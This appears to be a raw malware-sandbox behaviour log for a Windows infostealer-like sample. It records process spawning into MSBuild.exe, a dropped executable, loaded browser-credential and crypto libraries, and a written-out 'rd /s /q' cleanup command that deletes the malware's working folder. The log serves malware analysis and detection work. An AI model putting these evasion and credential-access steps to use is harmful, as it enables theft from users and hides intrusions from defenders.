                          Source: C:\ProgramData\CBFCFBFBFB.exeCode function: String function: 00B26AA8 appears 171 times
                          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3636 -s 308
                          Source: file.exeStatic PE information: invalid certificate
                          Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                          Source: file.exeStatic PE information: Section: .data ZLIB complexity 0.9919468068035944
                          Source: CBFCFBFBFB.exe.4.drStatic PE information: Section: .data ZLIB complexity 0.9911440122377623
                          Source: a43486128347[1].exe.4.drStatic PE information: Section: .data ZLIB complexity 0.9911440122377623
                          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@22/32@14/5
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C8E7030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree,4_2_6C8E7030
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_004114A5 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,4_2_004114A5
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_00411807 __EH_prolog3_catch_GS,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,CoSetProxyBlanket,VariantInit,FileTimeToSystemTime,GetProcessHeap,HeapAlloc,wsprintfA,VariantClear,4_2_00411807
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\76561199780418869[1].htmJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3636
                          Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess900
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7004:120:WilError_03
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Local\Temp\delays.tmpJump to behavior
                          Source: C:\ProgramData\CBFCFBFBFB.exeCommand line argument: MZx13_2_00AF20AD
                          Source: C:\ProgramData\CBFCFBFBFB.exeCommand line argument: MZx13_2_00AF20AD
                          Source: C:\ProgramData\CBFCFBFBFB.exeCommand line argument: MZx13_2_00AF20AD
                          Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                          Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                          Source: MSBuild.exe, 00000004.00000002.2218332574.00000000322C9000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.4.drBinary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
                          Source: MSBuild.exe, 00000004.00000002.2201069004.000000001FE28000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2196301722.0000000019EB0000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2224013548.000000003E1AE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2231687114.000000006CABF000.00000002.00000001.01000000.00000008.sdmp, nss3.dll.4.drBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                          Source: MSBuild.exe, 00000004.00000002.2218332574.00000000322C9000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.4.drBinary or memory string: SELECT ALL * FROM %s LIMIT 0;
                          Source: MSBuild.exe, 00000004.00000002.2201069004.000000001FE28000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2196301722.0000000019EB0000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2224013548.000000003E1AE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2231687114.000000006CABF000.00000002.00000001.01000000.00000008.sdmp, nss3.dll.4.drBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                          Source: MSBuild.exe, 00000004.00000002.2201069004.000000001FE28000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2196301722.0000000019EB0000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2224013548.000000003E1AE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2231687114.000000006CABF000.00000002.00000001.01000000.00000008.sdmp, nss3.dll.4.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                          Source: MSBuild.exe, 00000004.00000002.2201069004.000000001FE28000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2196301722.0000000019EB0000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2224013548.000000003E1AE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2231687114.000000006CABF000.00000002.00000001.01000000.00000008.sdmp, nss3.dll.4.drBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                          Source: MSBuild.exe, 00000004.00000002.2218332574.00000000322C9000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.4.drBinary or memory string: UPDATE %s SET %s WHERE id=$ID;
                          Source: MSBuild.exe, 00000004.00000002.2201069004.000000001FE28000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2196301722.0000000019EB0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');
                          Source: MSBuild.exe, 00000004.00000002.2218332574.00000000322C9000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.4.drBinary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
                          Source: MSBuild.exe, 00000004.00000002.2218332574.00000000322C9000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.4.drBinary or memory string: SELECT ALL id FROM %s WHERE %s;
                          Source: MSBuild.exe, 00000004.00000002.2218332574.00000000322C9000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.4.drBinary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
                          Source: MSBuild.exe, 00000004.00000002.2201069004.000000001FE28000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2196301722.0000000019EB0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS %s.'rbu_tmp_%q' AS SELECT *%s FROM '%q' WHERE 0;
                          Source: MSBuild.exe, 00000004.00000002.2218332574.00000000322C9000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.4.drBinary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
                          Source: MSBuild.exe, MSBuild.exe, 00000004.00000002.2201069004.000000001FE28000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2196301722.0000000019EB0000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2224013548.000000003E1AE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2231687114.000000006CABF000.00000002.00000001.01000000.00000008.sdmp, nss3.dll.4.drBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
                          Source: MSBuild.exe, 00000004.00000002.2201069004.000000001FE28000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2196301722.0000000019EB0000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2224013548.000000003E1AE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2231687114.000000006CABF000.00000002.00000001.01000000.00000008.sdmp, nss3.dll.4.drBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                          Source: MSBuild.exe, 00000004.00000002.2218332574.00000000322C9000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.4.drBinary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
                          Source: MSBuild.exe, 00000004.00000002.2201069004.000000001FE28000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2196301722.0000000019EB0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,nexec INT,ncycle INT,stmt HIDDEN);
                          Source: BGDGHJ.4.dr, GCFBAK.4.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                          Source: MSBuild.exe, 00000004.00000002.2201069004.000000001FE28000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2196301722.0000000019EB0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
                          Source: MSBuild.exe, 00000004.00000002.2218332574.00000000322C9000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.4.drBinary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
                          Source: MSBuild.exe, 00000004.00000002.2201069004.000000001FE28000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2196301722.0000000019EB0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
                          Source: MSBuild.exe, 00000004.00000002.2218332574.00000000322C9000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.4.drBinary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
                          Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
                          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3636 -s 308
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: C:\ProgramData\CBFCFBFBFB.exe "C:\ProgramData\CBFCFBFBFB.exe"
                          Source: C:\ProgramData\CBFCFBFBFB.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                          Source: C:\ProgramData\CBFCFBFBFB.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                          Source: C:\ProgramData\CBFCFBFBFB.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                          Source: C:\ProgramData\CBFCFBFBFB.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 900 -s 320
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\JJDBAEHIJKJK" & exit
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
                          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: C:\ProgramData\CBFCFBFBFB.exe "C:\ProgramData\CBFCFBFBFB.exe" Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\JJDBAEHIJKJK" & exitJump to behavior
                          Source: C:\ProgramData\CBFCFBFBFB.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
                          Source: C:\ProgramData\CBFCFBFBFB.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
                          Source: C:\ProgramData\CBFCFBFBFB.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wininet.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rstrtmgr.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ncrypt.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ntasn1.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dbghelp.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winhttp.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mswsock.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: iphlpapi.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winnsi.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dnsapi.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rasadhlp.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: fwpuclnt.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: schannel.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mskeyprotect.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: msasn1.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dpapi.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: gpapi.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ncryptsslp.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wbemcomn.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: amsi.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: version.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: sxs.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ntmarta.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mozglue.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wsock32.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: vcruntime140.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: msvcp140.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: windowscodecs.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: edputil.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: appresolver.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: bcp47langs.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: slc.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: sppc.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: pcacli.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mpr.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: sfc_os.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ntshrui.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: linkinfo.dllJump to behavior
                          Source: C:\ProgramData\CBFCFBFBFB.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winhttp.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: webio.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mswsock.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: iphlpapi.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winnsi.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dnsapi.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rasadhlp.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: fwpuclnt.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: schannel.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mskeyprotect.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ntasn1.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ncrypt.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ncryptsslp.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: msasn1.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: gpapi.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dpapi.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
                          Source: Window RecorderWindow detected: More than 3 window changes detected
                          Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                          Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                          Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                          Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                          Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                          Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                          Source: file.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                          Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                          Source: Binary string: freebl3.pdb source: MSBuild.exe, 00000004.00000002.2202720214.000000002047C000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.4.dr
                          Source: Binary string: mozglue.pdbP source: MSBuild.exe, 00000004.00000002.2211910779.00000000263E4000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmp, mozglue.dll.4.dr
                          Source: Binary string: freebl3.pdbp source: MSBuild.exe, 00000004.00000002.2202720214.000000002047C000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.4.dr
                          Source: Binary string: nss3.pdb@ source: MSBuild.exe, 00000004.00000002.2224013548.000000003E1AE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2231687114.000000006CABF000.00000002.00000001.01000000.00000008.sdmp, nss3.dll.4.dr
                          Source: Binary string: softokn3.pdb@ source: MSBuild.exe, 00000004.00000002.2218332574.00000000322C9000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.4.dr
                          Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: MSBuild.exe, 00000004.00000002.2221135617.000000003823A000.00000004.00000020.00020000.00000000.sdmp, vcruntime140.dll.4.dr
                          Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: MSBuild.exe, 00000004.00000002.2215082591.000000002C352000.00000004.00000020.00020000.00000000.sdmp, msvcp140.dll.4.dr
                          Source: Binary string: nss3.pdb source: MSBuild.exe, 00000004.00000002.2224013548.000000003E1AE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2231687114.000000006CABF000.00000002.00000001.01000000.00000008.sdmp, nss3.dll.4.dr
                          Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: MSBuild.exe, 00000004.00000002.2201069004.000000001FE28000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2196301722.0000000019EB0000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: mozglue.pdb source: MSBuild.exe, 00000004.00000002.2211910779.00000000263E4000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmp, mozglue.dll.4.dr
                          Source: Binary string: softokn3.pdb source: MSBuild.exe, 00000004.00000002.2218332574.00000000322C9000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.4.dr
                          Source: file.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                          Source: file.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                          Source: file.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                          Source: file.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
